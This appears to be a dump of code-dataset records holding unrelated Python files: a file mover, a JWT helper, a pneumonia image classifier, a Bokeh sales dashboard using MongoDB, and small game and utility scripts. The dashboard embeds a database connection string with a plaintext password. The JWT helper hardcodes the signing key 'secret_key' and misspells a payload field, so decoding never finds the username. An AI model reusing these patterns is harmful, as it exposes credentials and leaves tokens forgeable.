'(' + str(lbCnt) + ')'\r\n # 파일 명에 라벨이 존재하면\r\n # 라벨 안에 정수만 교체하면 된다.\r\n elif lbns is not None:\r\n renamedFileName = filename[:lbns] + str(lbCnt) + filename[lbne:]\r\n\r\n # 파일 이름을 변경한다.\r\n os.rename(path + '/' + filename, path + '/' + renamedFileName)\r\n # 파일을 최상위 디렉토리로 이동\r\n shutil.move(path + '/' + renamedFileName, self.__CONST_ROOT_PATH)\r\n print('renamedFileName', renamedFileName)\r\n # 라벨 값을 기억 한다.\r\n assert isinstance(lbCnt, int)\r\n self.__parsedFileNameDict[parsedFileName].append(lbCnt)\r\n else:\r\n # 루트가 아닐때, 중복되지 않은 파일명이므로 옮겨도 된다.\r\n if not path == self.__CONST_ROOT_PATH:\r\n shutil.move(path + '/' + filename, self.__CONST_ROOT_PATH)\r\n # 리스트 초기화\r\n if parsedFileName not in self.__parsedFileNameDict:\r\n print('init')\r\n self.__parsedFileNameDict[parsedFileName] = list()\r\n # 처음 발견되고 라벨이 장착된 파일이 발견될때\r\n if self.__hasLabel(filename):\r\n self.__parsedFileNameDict[parsedFileName].append(self.__getLabelNum(filename))\r\n else:\r\n # 라벨이 안달려 있는 경우는 0으로 취급\r\n self.__parsedFileNameDict[parsedFileName].append(0)\r\n print('parsedFileNameDict[parsedFileName]', self.__parsedFileNameDict[parsedFileName])\r\n\r\n # debugging\r\n print('cur list: ', self.__parsedFileNameDict)\r\n\r\n # if ext not in ['jpg', 'png', 'bmp', 'gif']: continue\r\n print(\"%s/%s\" % (path, filename))\r\n print(self.__findLabelNumPos(filename))\r\n\r\n # 루트 디렉토리의 자식 폴더들을 삭제\r\n def deleteFoldersInRoot(self):\r\n # listdir : 경로에 존재하는 폴더와 파일 출력\r\n for fdn in os.listdir(self.__CONST_ROOT_PATH):\r\n # 선택된 객체가 파일이 아닐때,\r\n if not os.path.isfile(self.__CONST_ROOT_PATH + '/' + fdn):\r\n # 해당 폴더를 삭제\r\n shutil.rmtree(self.__CONST_ROOT_PATH + '/' + fdn)\r\n print('delete dir: ' + self.__CONST_ROOT_PATH + '/' + fdn)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n fmtr = FileMoverToRoot('C:/Users/kdje0/Desktop/pythontest')\r\n fmtr.moveFilesToRoot()\r\n fmtr.deleteFoldersInRoot()","sub_path":"1st Implementation/FileMoverToRoot.py","file_name":"FileMoverToRoot.py","file_ext":"py","file_size_in_byte":8317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633049225","text":"\"\"\"\ncommon.decorator\n~~~~~~~~~~~~~~~~\n\nThis module implements the decorator function.\nUsage is verify user token whether valid or invalid.\n\n:copyright: (c) 2019 by JiuChou.\n:license: MIT, see LICENSE for more details.\n:updateTime: 2019.03.25\n\"\"\"\nimport jwt\nimport datetime\n\n# iss: JWT签发者\n# sub: JWT所面向的用户\n# aud: 接收JWT的一方\n# exp: JWT的过期时间\n# nbf: 定义在什么时间之前,该JWT都是不可用的\n# iat: JWT的签发时间\n# jti: JWT的唯一身份标识,主要用来作为一次性的token,从而回避重放攻击\ndef get_token(username):\n \"\"\"Get user token by username\n For example:\n >>> token = jwt.encode(\n {\n 'iss': \"svnlab\",\n 'sub': \"svnlab-frontend\",\n 'usernmae': \"jiuchou\",\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=10),\n 'iat': datetime.datetime.utcnow()\n },\n \"secret_key,\n algorithm=\"HS256\"\n )\n >>> print(token)\n \"\"\"\n playload = {\n 'iss': \"svnlab\",\n 'sub': \"svnlab-frontend\",\n 'usernmae': username,\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n 'iat': datetime.datetime.utcnow()\n }\n key = \"secret_key\"\n token = str(jwt.encode(playload, key, algorithm=\"HS256\"), encoding=\"utf-8\")\n return token\n\ndef get_username(token):\n \"\"\"Verity token: should be True if token is effective value.\n For example:\n >>> jwt.decode(token, \"secret_key\", algorithm=\"HS256\")\n \"\"\"\n try:\n decode_token = jwt.decode(token, \"secret_key\", algorithm=\"HS256\")\n username = decode_token.get(\"username\")\n return username\n except Exception as e:\n return None\n","sub_path":"svnlab/common/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359166498","text":"#Detecting 3 kinds of Pneumonia - 93.9% accuracy on test set, 93.9% on other metrics (precision, recall, f1score)\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy import arange\nfrom tqdm import tqdm\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.applications import InceptionResNetV2\nfrom tensorflow.keras.models import Sequential, save_model, load_model, Model\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout, BatchNormalization, Conv2D, MaxPooling2D\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.callbacks import ModelCheckpoint, Callback, EarlyStopping\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import *\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n\nimagePaths = []\nfor dirname, _, filenames in os.walk('./data/'):\n for filename in filenames:\n if (filename[-3:] == 'png' or filename[-4:] == 'jpeg'):\n imagePaths.append(os.path.join(dirname, filename))\n\nimgSize = 28\n\nX = []\nY = []\nhmap = {'VIRALPNEUMONIA': 'Viral Pneumonia', 'BACTPNEUMONIA': 'Bacterial Pneumonia', 'NORMAL': 'Normal', 'COVID-19': 'Covid-19'}\nfor imagePath in tqdm(imagePaths):\n label = imagePath.split(os.path.sep)[-2]\n \n image = cv2.imread(imagePath)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = cv2.resize(image, (imgSize, imgSize))\n\n X.append(image)\n Y.append(hmap[label])\n\nprint('Covid-19:',Y.count('Covid-19'))\nprint('Normal:',Y.count('Normal'))\nprint('Viral Pneumonia: ',Y.count('Viral Pneumonia'))\nprint('Bacterial Pneumonia: ',Y.count('Bacterial Pneumonia'))\n\n# encode class values as integers\nle = LabelEncoder()\nY = le.fit_transform(Y)\nY = to_categorical(Y)\n\n(trainX, testX, trainY, testY) = train_test_split(X, Y, test_size=0.20, stratify=Y, random_state=42)\n(trainX, valX, trainY, valY) = train_test_split(trainX, trainY, test_size=0.25, random_state=42)\ndel X\ndel Y\n\nntimes = 6\ntrainY = trainY.tolist()\nfor i in tqdm(range(len(trainX))):\n if (trainY[i][0] == 1):\n trainX += [trainX[i]]*ntimes\n trainY += [trainY[i]]*ntimes\n \ntrainY = np.array(trainY)\n\ntrainX = np.array(trainX).astype('float16')/255\n\nvalX = np.array(valX).astype('float16')/255\n\ntestX = np.array(testX).astype('float16')/255\n\ntrainAug = ImageDataGenerator(rotation_range=20, \n horizontal_flip = True,\n fill_mode=\"nearest\",\n vertical_flip=True)\n\nes = EarlyStopping(patience = 1500, \n monitor = \"val_accuracy\", \n mode=\"max\", \n verbose = 1)\n\n# checkpoint to save model\nchkpt = ModelCheckpoint(filepath=\"model.hdf5\", \n save_best_only=True,\n monitor = \"val_accuracy\",\n mode = \"max\",\n verbose=1)\n\"\"\"\nbaseModel = InceptionResNetV2(weights=\"imagenet\", include_top=False, input_shape=(imgSize, imgSize, 3), classes=4)\nmodel = Sequential()\nmodel.add(baseModel)\nmodel.add(Flatten())\nmodel.add(Dense(512, activation = 'relu',\n kernel_initializer=\"he_uniform\"))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\nmodel.add(Dense(4, activation = 'softmax'))\nfor layer in baseModel.layers:\n layer.trainable = False\nINIT_LR = 3e-4 #0.175 \nepochs = 100\nopt = Adam(lr=INIT_LR, decay=INIT_LR / epochs) \nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=[\"accuracy\"])\n\"\"\"\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(imgSize, imgSize, 3)))\nmodel.add(BatchNormalization())\n\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(512, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(128, activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(4, activation='softmax'))\n\nmodel.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=['accuracy'])\n\nepochs=3000\nBS = 128 #16\n\"\"\"\nhistory = model.fit(\n trainAug.flow(trainX, trainY, batch_size=BS, shuffle=True),\n steps_per_epoch=len(trainX) // BS,\n validation_data=(valX, valY),\n validation_steps=len(valX) // BS,\n callbacks = [es,chkpt],\n epochs=epochs,\n workers=8,\n class_weight={0:1.0/2538, 1:1.0/219, 2:1.0/2924, 3:1.0/1345})\n\n#Plots accuracy over epochs\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n\"\"\"\n\nmodel= load_model('./model/model.hdf5')\n\n#Against Train Set\npredIdxs = model.predict(trainX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = trainY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(trainY.argmax(axis=1), predIdxs))\nprint(classification_report(trainY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\n#Against Val Set\npredIdxs = model.predict(valX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = valY.argmax(axis=1), y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = valY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(valY.argmax(axis=1), predIdxs))\nprint(classification_report(valY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\n#Against Test Set\npredIdxs = model.predict(testX, batch_size=BS, verbose=1)\npredIdxs = np.argmax(predIdxs, axis=1)\n\nprint('Acc: {}'.format(accuracy_score(y_true = testY.argmax(axis=1), y_pred = predIdxs)))\nprint('Recall: {}'.format(recall_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('Precision: {}'.format(precision_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\nprint('f1: {}'.format(f1_score(y_true = testY.argmax(axis=1), y_pred = predIdxs, average='weighted')))\n\nprint(confusion_matrix(testY.argmax(axis=1), predIdxs))\nprint(classification_report(testY.argmax(axis=1), predIdxs, target_names=le.classes_, digits = 4))\n\"\"\"\nimport tensorflow as tf\nfrom tensorflow import saved_model\n\n# The export path contains the name and the version of the model\ntf.keras.backend.set_learning_phase(0) # Ignore dropout at inference\nmodel= load_model('model.hdf5')\nexport_path = '../covid-pneumonia/1'\n\n# Feth the Keras session and save the model\nwith tf.compat.v1.Session() as sess:\n tf.saved_model.save(\n sess,\n export_path,\n inputs={'images': model.input},\n outputs={t.name:t for t in model.outputs})\n\"\"\"","sub_path":"COVIDPneumonia.py","file_name":"COVIDPneumonia.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"442400308","text":"from collections import defaultdict\n\nword_summary = defaultdict(list)\n\nwith open('value_index_iter.py', 'r') as f:\n lines = f.readlines()\n\nfor idx, line in enumerate(lines, 1):\n # print(idx, line)\n # Create a list of words in current line\n words = [w.strip().lower() for w in line.split()]\n for word in words:\n word_summary[word].append(idx)\n\nprint(word_summary.items())\nfor k in word_summary:\n print('{} : {}'.format(k, word_summary[k]))\n","sub_path":"cookbook/value_index_iter.py","file_name":"value_index_iter.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"178687533","text":"#!/usr/bin/env python\n# -*- coding:utf-8 _*-\n\"\"\"\n@file: coroutine3.py\n@time: 14/12/2018\n@desc: python3 协程\n\"\"\"\n\nimport asyncio\n\n\n@asyncio.coroutine\ndef test(i):\n print(\"test_1\", i)\n r = yield from asyncio.sleep(1)\n print(\"test_2\", i)\n\n\nloop = asyncio.get_event_loop()\ntasks = [test(i) for i in range(5)]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n","sub_path":"coroutine3.py","file_name":"coroutine3.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"95044004","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 07 03:36:52 2017\n\n@author: Tanay Shah\n\"\"\"\n\nfrom pymongo import *\nfrom bokeh.charts import Bar, output_file, show\nimport pandas as pd\nimport random\nfrom datetime import datetime\nimport bokeh.plotting as bp\nfrom bokeh.plotting import save\nfrom bokeh.models import HoverTool\nfrom bokeh.models import CustomJS\nfrom bokeh.layouts import row , column\nfrom bokeh.models.widgets import DataTable, TableColumn, Button\nfrom bokeh.models.widgets import MultiSelect\nfrom bokeh.models.widgets import Dropdown\n\nclient = MongoClient('mongodb://user:abcd1234@testcluster-shard-00-00-7f3ht.mongodb.net:27017,testcluster-shard-00-01-7f3ht.mongodb.net:27017,testcluster-shard-00-02-7f3ht.mongodb.net:27017/pureregression?ssl=true&replicaSet=TestCluster-shard-0&authSource=admin')\ndb = client.pureregression\nreccon = db.transactions\nfrom operator import itemgetter\n\n\n\nreciever_acc = [\"8353836353\" , \"3593537324\" , \"6309123956\" ,\"3428263300\" , \"8465589101\" ,\"8918640615\" , \"1662370641\" , \"3936456709\" , \"3132050691\" , \"4771819058\"]\nsender_acc = [\"9353856354\" , \"2553577384\" , \"9009123556\" ,\"4728263300\" , \"5465589321\" ,\"6918640615\" , \"9062370641\" , \"2336456709\" , \"7832050691\" , \"6571819058\"]\nreciever_names= [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n\nreciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya']\nsender_names = [\"Sumod\" , \"Kishan\", \"Ishwar\" , \"Ramu\" , \"Gopal\" , \"Pawar\" , \"Urvil\" , \"Yash\" , \"Pandurang\", \"Manoj\"]\ngoods= [\"Clothes\" , \"Shoes\" , \"Grains\" , \"Pulses\" , \"Stationery\" , \"Vegetables\" , \"Fruits\" , \"Electronics\" , \"Utensils\" , \"Sugar\"]\nrate= [150 , 250 , 500 , 400 , 50 , 30 , 100 , 2000 , 800 , 80 ]\n\nlocations = ['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh']\ntransaction_methods = ['cash' , 'digital']\n\n'''\n#Adding data to DB\nfor j in range(0 , 100):\n goods_number = random.randint(0 , 9)\n reciever_number = random.randint(0 , 9)\n sending_method = transaction_methods[random.randint(0, 1)]\n recieving_method = transaction_methods[random.randint(0 , 1)]\n if (sending_method == 'cash' and recieving_method == 'cash') :\n recieving_method = 'digital'\n reccon.insert_one({\n \"sender_acc\": sender_acc[random.randint(0 , 9)],\n \"reciever_acc\": reciever_acc[reciever_number],\n \"sender_name\": sender_names[random.randint(0 , 9)],\n \"reciever_name\": reciever_names[random.randint(0 , 9)],\n \"goods\": goods[goods_number],\n \"quantity\" : random.randint(1, 5),\n \"rate\":rate[goods_number] + random.randint(0 ,50),\n \"timestamp\": str(datetime(2017 , random.randint(1 , 12) , random.randint(1 , 28) , 0, 0 ,0)),\n \"sending_method\": sending_method,\n \"recieving_method\": recieving_method,\n \"location\": locations[reciever_number]\n })\n \n'''\n \n#getting seller sales\ncount_sales = list(reccon.find({} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 1 , \"_id\":0} ))\ncount_sales = sorted(count_sales, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_sales)):\n dates.append(i)\n ind.append(count_sales[i]['timestamp'][:10])\n sales.append(count_sales[i]['quantity']*count_sales[i]['rate'])\n seller.append(count_sales[i]['reciever_name'])\nsales_disp = pd.DataFrame()\nsales_disp['sales'] = sales\nsales_disp['date'] = dates\nsales_disp['seller'] = seller\nsales_disp['ind'] = ind\n\n#getting cash details\ncount_cash = list(reccon.find({\"recieving_method\" : \"cash\"} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 1 , \"_id\":0} ))\ncount_cash = sorted(count_cash, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_cash)):\n dates.append(i)\n ind.append(count_cash[i]['timestamp'][:10])\n sales.append(count_cash[i]['quantity']*count_cash[i]['rate'])\n seller.append(count_cash[i]['reciever_name'])\ncash_disp = pd.DataFrame()\ncash_disp['cash'] = sales\ncash_disp['date'] = dates\ncash_disp['seller'] = seller\ncash_disp['ind'] = ind\n\n#getting digital trnx details\n#getting seller sales\ncount_digi = list(reccon.find({\"recieving_method\" : \"digital\"} , {\"reciever_name\":1 , \"goods\":1 , \"quantity\": 1, \"rate\": 1, \"timestamp\": 1 , \"_id\":0} ))\ncount_digi = sorted(count_digi, key=itemgetter('timestamp'))\nsales =[]\ndates =[]\nseller=[]\nind=[]\nfor i in range(0 , len(count_digi)):\n dates.append(i)\n ind.append(count_digi[i]['timestamp'][:10])\n sales.append(count_digi[i]['quantity']*count_digi[i]['rate'])\n seller.append(count_digi[i]['reciever_name'])\ndigi_disp = pd.DataFrame()\ndigi_disp['digi'] = sales\ndigi_disp['date'] = dates\ndigi_disp['seller'] = seller\ndigi_disp['ind'] = ind\n\nseller_source_digi = bp.ColumnDataSource({\n \"x\": digi_disp['digi'],\n \"y\": digi_disp['date'],\n \"seller\": digi_disp['seller'],\n \"date_range\": digi_disp['ind']\n })\n\nseller_source_cash = bp.ColumnDataSource({\n \"x\": cash_disp['cash'],\n \"y\": cash_disp['date'],\n \"seller\": cash_disp['seller'],\n \"date_range\": cash_disp['ind']\n })\n \nseller_source = bp.ColumnDataSource({\n \"x\": sales_disp['sales'],\n \"y\": sales_disp['date'],\n \"seller\": sales_disp['seller'],\n \"date_range\": sales_disp['ind']\n })\n \nmenu_location = [(\"Ambegaon\", \"loc_1\"), (\"Gondiya\", \"loc_2\"), (\"Rampur\", \"loc_3\") , (\"Devgadh\" , \"loc_4\")]\ndropdown_location = Dropdown(label=\"Select Locality\", button_type=\"warning\", menu=menu_location)\n\ntable_seller_source = bp.ColumnDataSource({\n \"seller_tname\": reciever_names,\n \"seller_locations\": reciever_corresponding_loc \n })\ncolumns = [\n TableColumn(field=\"seller_tname\", title=\"Sellers\")]\n \nseller_table = DataTable(source=table_seller_source, columns=columns, width=500, height=500 , fit_columns = True)\n\ndropdown_location.callback = CustomJS(args=dict(source=table_seller_source), code=\"\"\"\n var loc_arr = ['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh']\n var fa = cb_obj.value\n var seller_tname = []\n var seller_loc = []\n var seller_perma = [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n reciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya']\n var len_src = seller_perma.length\n for (i=0 ; i< len_src ; i++){\n if (reciever_corresponding_loc[i] == loc_arr[fa[4]-1]){\n seller_tname.push(seller_perma[i])\n seller_loc.push(reciever_corresponding_loc[i])\n } \n }\n \n source['data']['index']= []\n for (j=0 ; j< seller_tname.length ; j++){\n source['data']['index'].push(j) \n }\n source['data']['seller_tname']=seller_tname \n source['data']['seller_locations'] =seller_loc\n source.trigger('change');\n console.log(source.data)\n\n \"\"\"\n)\n\ntable_seller_source.callback = CustomJS(args=dict(source=table_seller_source , source1=seller_source , source2=seller_source_cash, source3=seller_source_digi), code=\"\"\"\n var indices = source.selected[\"1d\"].indices;\n console.log(indices)\n var seller_perma = [\"Amol\" , \"Anmol\" , \"Dhruv\", \"Ekansh\" , \"Karan\", \"Natesh\" , \"Omkar\" , \"Prit\" , \"Rushabh\" , \"Smitesh\"]\n reciever_corresponding_loc =['Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya' , 'Rampur' , 'Devgadh','Ambegaon' , 'Gondiya'] \n var loop_len = source1.data.x.length\n //console.log(source1.data)\n var x_new = []\n var y_new = []\n var date_new =[]\n var ind_new = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source1.data.seller[i] == seller_perma[indices[0]]){\n console.log(\"here\")\n x_new.push(source1.data.x[i])\n y_new.push(source1.data.y[i])\n date_new.push(source1.data.date_range[i])\n //ind_new.push(source1.data.ind[i])\n } \n \n }\n source1['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source1['data']['index'].push(j) \n }\n source1['data']['x'] = x_new\n source1['data']['y'] = y_new\n source1['data']['date_range'] = date_new\n \n \n // cash disp\n var loop_len = source2.data.x.length\n //console.log(source2.data)\n var x_new_2 = []\n var y_new_2 = []\n var date_new_2 =[]\n var ind_new_2 = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source2.data.seller[i] == seller_perma[indices[0]]){\n //console.log(\"here\")\n x_new_2.push(source2.data.x[i])\n y_new_2.push(source2.data.y[i])\n date_new_2.push(source2.data.date_range[i])\n //ind_new.push(source2.data.ind[i])\n } \n \n }\n source2['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source2['data']['index'].push(j) \n }\n source2['data']['x'] = x_new_2\n source2['data']['y'] = y_new_2\n source2['data']['date_range'] = date_new_2\n //source2['data']['ind'] = ind_new_2\n \n\n //digi disp\n var loop_len = source3.data.x.length\n //console.log(source3.data)\n var x_new_3 = []\n var y_new_3 = []\n var date_new_3 =[]\n var ind_new_3 = []\n for (i=0 ; i<loop_len ; i++){\n //console.log(source1.data.seller[i] + \" \" + indices[i])\n if (source3.data.seller[i] == seller_perma[indices[0]]){\n //console.log(\"here\")\n x_new_3.push(source3.data.x[i])\n y_new_3.push(source3.data.y[i])\n date_new_3.push(source3.data.date_range[i])\n //ind_new.push(source3.data.ind[i])\n } \n \n }\n source3['data']['index']= []\n for (j=0 ; j< x_new.length ; j++){\n source3['data']['index'].push(j) \n }\n source3['data']['x'] = x_new_3\n source3['data']['y'] = y_new_3\n source3['data']['date_range'] = date_new_3\n //source3['data']['ind'] = ind_new_3\n source1.trigger('change')\n source2.trigger('change')\n\n source3.trigger('change') \n \"\"\"\n)\nplot_sales = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Sales Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_sales.line(sales_disp['date'],sales_disp['sales'], source=seller_source, line_width=3, line_alpha=0.6)\n\n\nplot_cash = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Cash Sales Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_cash.line(cash_disp['date'],cash_disp['cash'], source=seller_source_cash, line_width=3, line_alpha=0.6 , line_color=\"red\")\n\nplot_digi = bp.figure(plot_width=400, plot_height=300,\n title=\"Seller Digital Transactions Insights\",\n tools=\"pan,wheel_zoom,box_zoom, box_select,reset,hover,previewsave\",min_border=1 , y_axis_label= \"Sales\" , x_axis_label = \"Time\")\n \nplot_digi.line(digi_disp['date'],digi_disp['digi'], source=seller_source_digi, line_width=3, line_alpha=0.6 , line_color=\"green\")\n\nhover_digi = plot_digi.select(dict(type=HoverTool))\nhover_digi.tooltips = {\"date\": \"@date_range - seller: @seller\"} \n\nhover_cash = plot_cash.select(dict(type=HoverTool))\nhover_cash.tooltips = {\"date\": \"@date_range - seller: @seller\"} \n#p = Bar(sales_disp, 'date', values='sales',\n# title=\"Total Sales for \" + reciever_name, color=\"yellow\" , source= seller_source , legend=False)\nhover_sales = plot_sales.select(dict(type=HoverTool))\nhover_sales.tooltips = {\"date\": \"@date_range - seller: @seller\"} \nsave(row(row(column(plot_sales, plot_digi) , plot_cash) , column(dropdown_location , seller_table)), 'dashboard.html')\n\n\n","sub_path":"analytics/dashboards-python/dashboardSeller.py","file_name":"dashboardSeller.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"33181628","text":"import requests\n\nURL = 'https://api.coinone.co.kr/ticker?currency=all'\nresponse = requests.get(URL).json()\n\ncoinone_btc = float(response['btc']['last'])\ncoinone_xrp = float(response['xrp']['last'])\ncoinone_eos = float(response['eos']['last'])\ncoinone_bat = float(response['bat']['last'])\n\n# def numberWithCommas(x):\n# return x.toString().replace(/\\B(?=(\\d{3})+(?!\\d))/g, \",\");\n# }\nprint(coinone_btc)","sub_path":"coinone-webhook/coinone-ticker.py","file_name":"coinone-ticker.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"305688087","text":"import collections,pygame,vector\nimport objects,utils,move_repo\nfrom move_repo import Jump, Walk\nfrom vector import Vector\nclass AI(object):\n goals=[]\n def update_obj(self,e, args):\n pass\nclass DoNothingAI(AI):\n def update_obj(self, e, args):\n pass\nclass GeoJumperAI(AI):\n def update_obj(self, e, args):\n for event in args[\"events\"]:\n if event.type==pygame.MOUSEBUTTONDOWN:\n move_repo.Jump.run(e)\nclass PlayerAI(AI):\n selected_move=0\n def update_obj(self, e, args):\n ngoals=[]\n for i in self.goals:\n i.update_obj(e, args)\n if not i.satisfied:ngoals.append(i)\n self.goals=ngoals\n for event in args[\"events\"]:\n if event.type==pygame.MOUSEBUTTONDOWN:\n x, y=pygame.mouse.get_pos()\n if self.selected_move==0:\n self.goals.append(MoveGoal(Vector(x, y)))\nclass MoveGoal(object):\n def __init__(self, target):\n self.target=target\n def update_obj(self, e, args):\n pass\n def satisfied(self, e):\n return (e.pos-self.target).magnitude<5\nai_dict={\"basic/nothing\":DoNothingAI, \"test/geojumper\":GeoJumperAI, \"basic/playerai\":PlayerAI}\nclass Entity(objects.Object):\n skills=collections.defaultdict(int)\n hp=0\n moves=[]\n energy=0\n ai=DoNothingAI\n def ondeath(self):return 1\n def __init__(self, x, y, who=\"\"):\n f=file(who+\".txt\", \"r\")\n setup=f.read().split(',')\n for command in setup:\n key=command.split(':')\n if key[0]==\"HP\":\n self.hp=int(key[1])\n if key[0]==\"IMG\":\n image=\"res/sprites/\"+key[1]+\".png\"\n if key[0]==\"AI\":\n self.ai=ai_dict[key[1]]()\n if key[0]==\"MOVE\":\n self.moves.append(move_repo.move_dict[key[1]])\n super(Entity, self).__init__(x=x, y=y, image=image)\n def update(self, args):\n self.energy+=1\n if self.hp==0:\n if self.ondeath():\n self.kill()\n self.ai.update_obj(self, args)\n super(Entity, self).update(args)\n","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514328626","text":"#!/usr/bin/env python\n\n\nimport rospy\nimport roslib\nimport kinematics as urkin\n# roslib.load_manifest(\"ur_kinematics\")\n# from ur_kin_py import forward, inverse\nfrom std_msgs.msg import String\nfrom industrial_msgs.msg import RobotStatus\nfrom geometry_msgs.msg import Pose, Point, Quaternion, TwistStamped, TransformStamped, Transform\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler, quaternion_slerp, euler_from_matrix, quaternion_from_matrix, euler_matrix, quaternion_matrix\nimport numpy as np\nfrom nav_msgs.msg import 